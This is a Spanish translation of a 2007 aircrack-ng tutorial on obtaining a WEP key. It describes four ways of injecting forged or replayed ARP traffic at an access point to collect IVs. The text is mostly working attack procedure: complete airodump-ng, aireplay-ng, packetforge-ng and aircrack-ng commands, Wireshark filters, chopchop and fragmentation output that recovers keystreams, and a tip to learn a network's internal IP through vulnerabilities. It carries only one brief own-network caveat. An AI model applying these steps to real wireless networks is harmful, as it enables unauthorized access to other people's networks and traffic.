Version: 1.15 Junio 9, 2007
By: darkAudax
Traducción: Última revisión el 18 de Julio de 2007
Archivo usado en este tutorial: arpcapture-01.cap
Durante mucho tiempo se discutió como usar una tarjeta wireless para generar paquetes con los que obtener la clave WEP de un punto de acceso. Este tutorial describe 4 procedimientos con ejemplos sobre como hacer esto. Los ejemplos provienen de hechos reales y no son solo teoría. Cada uno de ellos nos han servido para obtener la clave WEP.
La idea básica es usar la tarjeta wireless como cliente para generar paquetes de datos con IVs, que podremos usar para obtener la clave WEP. Normalmente el punto de acceso genera paquetes de datos con IVs; entonces ¿por qué necesitamos asociar un cliente wireless al punto de acceso? Aquí están unas pocas razones:
Me gustaría dar las gracias al equipo de desarrollo de la suite aircrack-ng por crear estás herramientas tan potentes. Y también a toda la gente que viene al foro con ideas y técnicas descritas en este tutorial. Yo realmente estoy asombrado por las técnicas de este tutorial. Mi misión ha sido simplemente juntarlas en un lugar en el que se describen de forma detallada.
Por favor enviame cualquier mensaje constructivo, positivo o negativo.
En los ejemplos, la opción “doble guión bssid” se muestra como “- -bssid”. Acuérdate de borrar el espacio entre los dos guiones cuando lo uses. Esto tambien se aplica a “- -ivs”, “- -arpreplay”, “- -deauth”, “- -channel”, “- -arp” y “- -fakeauth”.
Sistema operativo: WinXP (no importa realmente)
Dirección MAC: 00:0F:B5:46:11:19
ESSID: teddy (no es importante)
Dirección MAC: 00:14:6C:7E:40:80
Canal: 9
Sistema operativo: Linux
Dirección MAC: cualquiera
Sistema operativo: Linux
Dirección MAC: 00:40:F4:77:F0:9B
Sistema operativo: Linux
Dirección MAC: 00:0D:60:2E:CC:E1
Sistema operativo: Linux
Dirección MAC: 00:09:5B:EC:EE:F2
Este tutorial cubre cuatro escenarios:
Entremos ahora en detalles…
Vamos a usar un paquete de datos capturado. Suponemos que estuviste ejecutando airodump-ng y capturaste paquetes del punto de acceso y piensas que tienes algunos arps que podrías usar para inyectarlos.
Los paquetes ARP no son los únicos que podemos usar. Pero nos centramos en estos porque son los que garantizan que tengamos éxito y además son los más fáciles de encontrar en un archivo de capturas. Decimos que los ARPs nos garantizan el éxito porque el cliente debe responder a una petición arp (arp request) directamente. Recuerda que no es cualquier ARP. Debe ser un ARP para el cliente específico al que queremos atacar.
Primero, tenemos que haber capturado paquetes del punto de acceso en cuestión. Para reducir el tamaño, podíamos haber usado el filtro BSSID y especificar el canal. En nuestro ejemplo:
airodump-ng –channel 9 –bssid 00:14:6C:7E:40:80 -w aprcapture ath0
Necesitaremos uno o más clientes wireless activos mientras hacemos la captura. Si no hay actividad ninguna, será imposible que capturemos algún paquete de datos. Mientras estamos capturando datos, podemos copiar el archivo para analizarlo mientras la captura continua. Tambien podemos ejecutar WireShark en tiempo real y ver los paquetes tan pronto como nos llegan.
Ahora el objetivo es encontrar un paquete ARP del punto de acceso a un cliente. El cliente siempre responderá al “arp request”. Esto significa que el cliente generará un “arp reply” que regresará al punto de acceso.
Características del paquete que buscamos:
Características del paquete “de salida” que queremos:
Resumiendo, buscamos un “ARP request” al cliente y la subsecuente respuesta.
Para ello introducimos el siguiente filtro en Wireshark: (wlan.bssid == 00:14:6c:7e:40:80 and (frame.pkt_len>=68 and frame.pkt_len le 86))
Esto selecciona los paquetes que salen o llegan al punto de acceso y que tienen una longitud entre 68 y 86 inclusive.
Tendrás que cambiar el “wlan.bssid” por la dirección MAC de tu punto de acceso y probablemente cambiar la longitud de los paquetes a buscar para encontrar más fácilmente cual es el adecuado. El filtro expuesto debería de ser un buen punto de partida.
Una vez que tengas localizados los paquetes, puedes usar otro filtro para reducir la búsqueda a un cliente específico: (wlan.bssid == 00:14:6c:7e:40:80 and (frame.pkt_len>=68 and frame.pkt_len le 86) and (wlan.da == ff:ff:ff:ff:ff:ff or wlan.sa == 00:0f:b5:46:11:19))
Cambia el valor de “wlan.sa” por el de tu cliente que quieres atacar. Cambia la longitud del paquete para reducir las posibilidades si ves que es necesario.
Resumiendo, estamos buscando un “ARP request” y la subsecuente respuesta. El archivo que puedes descargar “aprcapture-01.cap” tiene ejemplos reales. Puedes usar los filtros mencionados en este archivo.
Aquí ponemos un resumen de que paquetes se trata. Los paquetes están númerados desde el primero al último por orden. Si le echas un vistazo a el archivo arp de ejemplo con WireShark verás los siguientes números de paquete:
Los dos posibles paquetes que podemos usar son 416 o 503. Puedes escoger cualquiera de los dos. El 503 es mejor puesto que genera dos paquetes por cada uno que nosostros inyectemos: La respuesta del cliente al AP y la del AP al cliente wireless. Básicamente doblarás la velocidad (rate) de inyección. Para la gente que pregunta como incrementar la velocidad de inyección, esta es una técnica.
Una vez que has encontrado uno o mas de estos paquetes haz click derecho y márcalo (Mark packet). Despues vas al menu “File” y haz click en “save as” y selecciona “marked packets only” para gravar el paquete con un nombre como por ejemplo “dsarprequests.cap” u otro nombre que quieras tu. Ahora tienes un archivo con un “ARP requests”.
Recuerda que no tenemos garantizado totalmente que el paquete seleccionado funcione. Solo es un candidato seleccionado basado en nuestra observación. Puede que necesites probar un poco con otros paquetes para conseguir que funcione.
Reinicia la captura de paquetes si todavía no está funcionando:
airodump-ng --channel 9 --bssid 00:14:6C:7E:40:80 -w aprcapture ath0
Cerciórate de que no usas la opción “- -ivs” si quieres utilizar más adelante el método PTW con aircrack-ng (aircrack-ng -z). El método PTW requiere los paquetes enteros y solo funciona con ARPs. Ahora usa el ataque de inyección interactivo en otra consola:
aireplay-ng -2 -r dsarprequests.cap ath0
De esta forma estás enviando el “ARP requests” desde tu PC al cliente directamente, y no a través del punto de acceso. El cliente enviará una respuesta “ARP replay” por cada “arp request”. Ahora tus paquetes de datos comenzarán a crecer espectacularmente. Inicia aircrack-ng (aircrack-ng arpcapture*.ivs) en una tercera consola y obtendrás la clave wep. Felicidades!
En este escenario vamos a hacer la captura y la inyección al mismo tiempo.
Primero, comienza a capturar paquetes que emite o recibe el punto de acceso en cuestión. Para reducir el tamaño del archivo, usa el filtro de BSSID y especifica el canal. En nuestro ejemplo:
airodump-ng --channel 9 --bssid 00:14:6C:7E:40:80 --ivs -w aprcapture ath0
Ahora abre una segunda consola para iniciar la inyección interactiva:
aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 ath0
Tendrás que cambiar “-b” por la dirección MAC del punto de acceso deseado. Añade el tamamño mínimo “-m” y máximo “-n” del paquete. Lo habitual es poner un mínimo de 68 y un máximo de 86. No está de mas experimentar con otros valores.
Las características del paquete que estamos buscando son:
Las otras opciones que añadimos al comando son:
Aquí ponemos un ejemplode un paquete que deberíamos seleccionar:
Read 210 packets... Size: 68, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:09:5B:EC:EE:F2 0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 0x0010: 0009 5bec eef2 409a 7501 0000 1a85 1808 ..[...@.u....... 0x0020: 3820 91ae 6e38 248d 0555 1703 b645 24a7 8 ..n8$..U...E$. 0x0030: 3e0e 943b f531 66a2 a825 adf9 178d 3699 >..;.1f..%....6. 0x0040: 7903 7765 y.we Use this packet ?
Recuerda que necesitarás probar algunos paquetes para conseguir que funcione. El ARP debe ser de un cliente wireless. Una vez que estes inyectando paquetes y tengas suficientes, inicia aircrack-ng para obtener la clave WEP.
Primero necesitamos generar el archivo xor. Este archivo nos da la posibilidad de crear nuevos paquetes encriptados para inyectarlos.
Puedes ejecutar el siguiente comando y seleccionar un paquete de un tamaño adecuado. Tiene que ser mayor que el paquete ARP que queremos crear. Por lo tanto elige algo como 86 o mas bytes. Tambien necesitamos determinar la dirección IP que está usando. por lo tanto elige un paquete con origen o destino la dirección MAC de la estación wireless. La razón de esto es que despues usaremos tcpdump para mirar los paquetes desencriptados y obtener la dirección.
Run “aireplay-ng -4 ath0 -h 00:0F:B5:46:11:19”.
Cambia -h por la dirección MAC del cliente asociado con el AP. Puedes tambien hacer una falsa autenticación y usar esta MAC. Es solo porque es más simple usar una MAC ya asociada al AP.
Aunque este ejemplo es de un “arp request”, como mencionamos anteriormente , deberías probar a capturar un paquete con origen o destino la tarjeta wireless. Aquí está la salida del ejemplo:
Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:40:F4:77:F0:9B 0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 0x0010: 0040 f477 f09b 60e3 6201 0000 55b1 496a .@.w..`.b...U.Ij 0x0020: ff2d a9ad 8161 7888 8d2d 08a7 3d10 4712 .-...ax..-..=.G. 0x0030: 1bd2 8701 8674 82b3 8746 22e3 d4d5 4e85 .....t...F"...N. 0x0040: 9911 679d b99d 4996 0c01 d7b4 6549 1840 ..g...I.....eI.@ 0x0050: 0723 54fb 488d .#T.H. Use this packet ? y Saving chosen packet in replay_src-1231-132955.cap Offset 85 ( 0% done) | xor = C4 | pt = 49 | 41 frames written in 124ms Offset 84 ( 1% done) | xor = 89 | pt = C1 | 228 frames written in 684ms Offset 83 ( 3% done) | xor = DB | pt = 20 | 129 frames written in 387ms Offset 82 ( 5% done) | xor = 28 | pt = 7C | 245 frames written in 735ms Offset 81 ( 7% done) | xor = 23 | pt = 00 | 5 frames written in 15ms Offset 80 ( 9% done) | xor = 07 | pt = 00 | 30 frames written in 90ms Offset 79 (11% done) | xor = 40 | pt = 00 | 29 frames written in 87ms Offset 78 (13% done) | xor = 18 | pt = 00 | 6 frames written in 18ms Offset 77 (15% done) | xor = 49 | pt = 00 | 171 frames written in 513ms Offset 76 (17% done) | xor = 65 | pt = 00 | 249 frames written in 747ms Offset 75 (19% done) | xor = B4 | pt = 00 | 88 frames written in 264ms Offset 74 (21% done) | xor = D7 | pt = 00 | 156 frames written in 469ms Offset 73 (23% done) | xor = 01 | pt = 00 | 249 frames written in 746ms Offset 72 (25% done) | xor = 0C | pt = 00 | 63 frames written in 189ms Offset 71 (26% done) | xor = 96 | pt = 00 | 12 frames written in 36ms Offset 70 (28% done) | xor = 49 | pt = 00 | 45 frames written in 135ms Offset 69 (30% done) | xor = 9D | pt = 00 | 7 frames written in 21ms Offset 68 (32% done) | xor = B9 | pt = 00 | 224 frames written in 672ms Offset 67 (34% done) | xor = 9D | pt = 00 | 153 frames written in 459ms Offset 66 (36% done) | xor = 67 | pt = 00 | 194 frames written in 583ms Offset 65 (38% done) | xor = 11 | pt = 00 | 19 frames written in 56ms Offset 64 (40% done) | xor = 99 | pt = 00 | 127 frames written in 381ms Offset 63 (42% done) | xor = E8 | pt = 6D | 209 frames written in 627ms Offset 62 (44% done) | xor = 79 | pt = 37 | 139 frames written in 417ms Offset 61 (46% done) | xor = 7D | pt = A8 | 53 frames written in 159ms Offset 60 (48% done) | xor = 14 | pt = C0 | 76 frames written in 228ms Offset 59 (50% done) | xor = E3 | pt = 00 | 204 frames written in 612ms Offset 58 (51% done) | xor = 22 | pt = 00 | 47 frames written in 141ms Offset 57 (53% done) | xor = 46 | pt = 00 | 203 frames written in 608ms Offset 56 (55% done) | xor = 87 | pt = 00 | 122 frames written in 367ms Offset 55 (57% done) | xor = B3 | pt = 00 | 9 frames written in 27ms Offset 54 (59% done) | xor = 82 | pt = 00 | 223 frames written in 669ms Offset 53 (61% done) | xor = 47 | pt = 33 | 241 frames written in 723ms Offset 52 (63% done) | xor = B1 | pt = 37 | 123 frames written in 368ms Offset 51 (65% done) | xor = A9 | pt = A8 | 20 frames written in 60ms Offset 50 (67% done) | xor = 47 | pt = C0 | 97 frames written in 291ms Offset 49 (69% done) | xor = 49 | pt = 9B | 188 frames written in 564ms Offset 48 (71% done) | xor = EB | pt = F0 | 47 frames written in 143ms Offset 47 (73% done) | xor = 65 | pt = 77 | 64 frames written in 190ms Offset 46 (75% done) | xor = B3 | pt = F4 | 253 frames written in 759ms Offset 45 (76% done) | xor = 50 | pt = 40 | 109 frames written in 327ms Offset 44 (78% done) | xor = 3D | pt = 00 | 242 frames written in 726ms Offset 43 (80% done) | xor = A6 | pt = 01 | 194 frames written in 583ms Offset 42 (82% done) | xor = 08 | pt = 00 | 99 frames written in 296ms Offset 41 (84% done) | xor = 29 | pt = 04 | 164 frames written in 492ms Offset 40 (86% done) | xor = 8B | pt = 06 | 69 frames written in 207ms Offset 39 (88% done) | xor = 88 | pt = 00 | 137 frames written in 411ms Offset 38 (90% done) | xor = 70 | pt = 08 | 229 frames written in 687ms Offset 37 (92% done) | xor = 60 | pt = 01 | 232 frames written in 696ms Offset 36 (94% done) | xor = 81 | pt = 00 | 19 frames written in 57ms Offset 35 (96% done) | xor = AB | pt = 06 | 230 frames written in 690ms Sent 969 packets, current guess: C5... The AP appears to drop packets shorter than 35 bytes. Enabling standard workaround: ARP header re-creation. Warning: ICV checksum verification FAILED! Saving plaintext in replay_dec-1231-133021.cap Saving keystream in replay_dec-1231-133021.xor Completed in 22s (2.18 bytes/s)
Despues mira el paquete desencriptado con Wireshark o tcpdump para conseguir la información sobre la IP que necesitamos. Si no sabes como hacerlo, mira el ejemplo a continuación. En este caso, hemos tenido suerte y conseguimos la IP del cliente wireless. Puede que tengas que probar unos cuantos paquetes para conseguir la IP del cliente wireless.
tcpdump -n -vvv -e -s0 -r replay_dec-1231-133021.cap reading from file replay_dec-1231-133021.cap, link-type IEEE802_11 (802.11) 13:30:21.150772 0us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:f0:9b LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000), ethertype ARP (0x0806): arp who-has 192.168.55.109 tell 192.168.55.51
Ahora tenemos la IP del cliente wireless y podemos usar el archivo xor para crear un paquete ARP. Asegurate completamente de que incluyes las opciones -j y -o.
Como estás usando la versión 0.9 entonces el comando adecuado es:
packetforge-ng --arp -a 00:14:6C:7E:40:80 -c 00:0F:B5:46:11:19 -h 00:40:F4:77:F0:9B -j -o -l 192.168.55.109 -k 192.168.55.51 -y replay_dec-1231-133021.xor -w arpforge.cap
Este comando es correcto para la versión 0.6.2. Había un bug en la versión 0.6.2 que consistia en que las opciones -k y -l estaban intercambiadas.
packetforge-ng –arp -a 00:14:6C:7E:40:80 -c 00:0F:B5:46:11:19 -h 00:40:F4:77:F0:9B -j -o -k 192.168.55.109 -l 192.168.55.51 -y replay_dec-1231-133021.xor -w arpforge.cap
Despues de crear el paquete, usa tcpdump para revisarlo. Mira a continuación, parece que está correcto!
tcpdump -n -vvv -e -s0 -r arpforge.cap reading from file arpforge.cap, link-type IEEE802_11 (802.11) 13:32:06.523444 WEP Encrypted 258us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:f0:9b Data IV:162 Pad 0 KeyID 0
Como estás probando con tu propio AP (si no es así NO CONTINUES), desencripta el paquete y asegurate de que es correcto. Este paso no es necesario, solo sirve para comprobar por ti mismo que has generado el paquete correcto.
Desencripta el paquete con: airdecap-ng -e teddy -w <put your WEP key here> arpforge.cap Echale un vistazo al paquete desencriptado: tcpdump -n -r arpforge-dec.cap Debería aparecer algo como esto:
reading from file arpforge-dec.cap, link-type EN10MB (Ethernet) 16:44:53.673597 arp who-has 192.168.55.51 tell 192.168.55.109
Parece que está bien, ya que sabemos que nuestro cliente tiene la IP 192.168.55.109 y queremos capturar un “arp request” con destino ese cliente.
Por lo tanto, ahora inyectamos el paquete:
aireplay-ng -2 -r arpforge.cap ath0
En este punto, debeías ser capaz de generar paquetes de datos para usarlos con aircrack-ng y obtener la clave WEP.
El ataque de fragmentación es básicamente lo mismo que el chopchop. La única diferencia es que usamos el ataque de fragmentación para obtener el archivo xor en lugar de la técnica chopchop.
Primero, necesitas usar la dirección MAC de un cliente asociado al AP o hacer una autenticación falsa.
Uno de los desafios es determinar que IP usamos en el comando “aireplay-ng -5” porque en teoría no sabemos el rango de IPs usadas en la red wireless. Para esto hay un par de estrategias que podríamos usar. Una primera buena idea es usar una IP del rango con el que por defecto viene configurado ese AP de fábrica. Muy poca gente cambia las direcciones IPs por defecto. Otra alternativa es mirar si podemos obtener la IP interna del AP a través de alguna vulnerabilidad a través de servidores web, páginas web, cabeceras de e-mail, etc…
Sobra decir, que hay un truco que funciona en la mayoría de los APs. Usa una IP 255.255.255.255. Por defecto, aireplay-ng usa 255.255.255.255 para ambas IPs de origen y de destino.
Hay algunos problemas de hardware con el ataque de fragmentación:
Aquí está el comando a ejecutar:
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0
Waiting for a data packet... Size: 144, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = 00:0F:B5:46:11:19 Source MAC = 00:0D:60:2E:CC:E1 0x0000: 0842 0201 000f b546 1119 0014 6c7e 4080 .B.....F....l~@. 0x0010: 000d 602e cce1 1083 7214 0000 5da7 d458 ..`.....r...]..X 0x0020: 6c90 0329 12ab 3d03 c37d 600b cdac 2706 l..)..=..}`...'. 0x0030: 19c7 9253 65b3 f163 1a17 8005 04ff 961f ...Se..c........ 0x0040: 01c4 0f6a 0047 e38b cb00 c303 f805 d96f ...j.G.........o 0x0050: 6c14 2479 bb5b aae3 f5f4 4f40 fc42 d703 l.$y.[....O@.B.. 0x0060: 8d49 1b91 4d5e 0787 a737 1d18 62a2 a828 .I..M^...7..b..( 0x0070: 75ab fdbb e3c2 e276 18c9 7641 a655 a4d2 u......v..vA.U.. 0x0080: acc4 d9f9 8c1b a12b be35 99a7 b793 5bec .......+.5....[. Use this packet ?
Contesta “y” y comenzará el ataque de fragmentación. Aquí está la salida. Algunas veces necesitarás probar varios paquetes para tener éxito.
Saving chosen packet in replay_src-0113-170504.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0113-170526.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Bingo! El archivo fragment-0113-170526.xor es el archivo xor con el que podremos generar el paquete arp para inyectar.
A partir de aquí el proceso es idéntico al del ataque chopchop. El gran problema es conocer la dirección IP para usarla. Como mencionamos antes hay varias posibilidades, hay que investigarlas.